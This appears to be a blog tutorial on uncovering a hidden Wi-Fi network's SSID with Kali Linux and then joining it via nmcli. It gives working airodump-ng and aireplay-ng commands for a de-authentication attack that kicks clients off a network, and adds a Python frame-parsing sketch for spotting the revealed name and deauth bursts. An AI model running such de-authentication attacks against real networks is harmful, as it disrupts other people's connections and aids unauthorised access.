How to Find and Connect to Hidden Wifi Network


Suppose you have a device that communicates using wifi, and you already know the password, but you can’t find the SSID name on your phone or computer. How can you connect? In this post, I will show you how to find and connect to the hidden network using Kali Linux.

Prerequisites

  • Kali Linux
  • Wifi adapter that supports monitor mode

Getting SSID Name

Make sure you have a wifi adapter that supports monitor mode. Alfa wifi adapters are well known for this feature. For 2.4 GHz, you can get the AWUS036NH, and for 5 GHz, you can get the AWUS036ACH.

Plug it in and set it to monitor mode. Replace wlan0 with your own wifi interface name.

ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up

Run airodump-ng

airodump-ng wlan0

On the list you will now find some hidden networks; for each one, airodump-ng shows a hidden-SSID placeholder that tells you how many characters the name has. There are two ways to get the SSID name. The first is the passive way: you wait for a client to connect, which takes time and does not always work.

The second is the aggressive way: you kick the clients off that network so that they reconnect. A client's connection reveals the SSID name, and airodump-ng saves it.

Now focus on the network you want to connect to. Find its channel and restart airodump-ng so that it scans only that channel.

airodump-ng wlan0 --channel 1

Leave that scan running and open a new terminal. Let’s start a de-authentication attack to kick the clients off the network.

aireplay-ng -0 5 -a XX:XX:XX:XX:XX:XX wlan0

The -0 parameter selects the de-authentication attack, and 5 is the packet count. The -a parameter is the BSSID of the network you want to de-auth, and wlan0 is the network interface.

Once you launch the attack, the clients will be kicked out and will reconnect, and the terminal running airodump-ng will reveal the network's SSID name.

Remember, this attack does not work if no client is connected to the network.
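The steps above work because hiding the SSID only blanks it in beacons, while the client's own association request carries it unencrypted. The Python sketch below is an added example (not code from the original post) that parses management frames the way a wireless monitor or IDS would, and also counts the de-authentication frames that precede the reveal. The frame bytes, MAC addresses and the SSID lab-net are constructed sample values, and the build helper is hypothetical.

```python
HDR = 24  # management header: frame control, duration, 3 addresses, sequence control
FIXED = {0: 4, 2: 10, 5: 12, 8: 12}  # fixed body bytes: assoc req, reassoc req, probe resp, beacon
BEACON, DEAUTH = 8, 12

def ssid_element(body):
    """Return the raw SSID element (id 0) from the tagged elements, or None."""
    i = 0
    while i + 2 <= len(body):
        eid, elen = body[i], body[i + 1]
        if i + 2 + elen > len(body):
            return None  # truncated element, stop parsing
        if eid == 0:
            return body[i + 2:i + 2 + elen]
        i += 2 + elen
    return None

def analyse(frames):
    """Per BSSID: blanked-name length, cleartext SSID if seen, deauth count."""
    nets = {}
    for f in frames:
        if len(f) < HDR or (f[0] >> 2) & 3 != 0:
            continue  # too short, or not a management frame
        subtype = f[0] >> 4
        net = nets.setdefault(f[16:22].hex(":"), {"hidden_len": None, "ssid": None, "deauths": 0})
        if subtype == DEAUTH:
            net["deauths"] += 1
        elif subtype in FIXED:
            raw = ssid_element(f[HDR + FIXED[subtype]:])
            if raw is None:
                continue
            if any(raw):  # a real name, sent unencrypted
                net["ssid"] = raw.decode("utf-8", "replace")
            elif subtype == BEACON:  # empty or all-NUL: the hidden placeholder
                net["hidden_len"] = len(raw)
    return nets

def build(subtype, dst, src, bssid, body):
    """Assemble a constructed management frame (no radiotap header, no FCS)."""
    return bytes([subtype << 4, 0]) + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + body

# Constructed sample capture: addresses and the SSID "lab-net" are made up.
AP, STA, ALL = bytes.fromhex("020000000001"), bytes.fromhex("020000000002"), b"\xff" * 6
SAMPLE = [build(BEACON, ALL, AP, AP, bytes(12) + b"\x00\x07" + bytes(7))]
SAMPLE += [build(DEAUTH, ALL, AP, AP, b"\x07\x00")] * 5
SAMPLE += [build(0, AP, STA, AP, b"\x31\x04\x0a\x00" + b"\x00\x07lab-net")]

if __name__ == "__main__":
    for bssid, net in analyse(SAMPLE).items():
        print(bssid, net)
```

For a network owner, the takeaway is that a hidden SSID is not an access control, and that a burst of de-authentication frames followed by reassociation is something a monitor can see and alert on.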

Connecting to Hidden Network

Now that we have the SSID name, we can simply connect to it. Here I am using nmcli, and the network uses WEP. The password is already known.

nmcli c add type wifi con-name <conname> ifname wlan0 ssid <ssidname>

nmcli con modify <conname> wifi-sec.key-mgmt none

sudo nmcli c up <conname> --ask

I will post how I got the WEP password later when I have time. Have a nice connection! 🙂

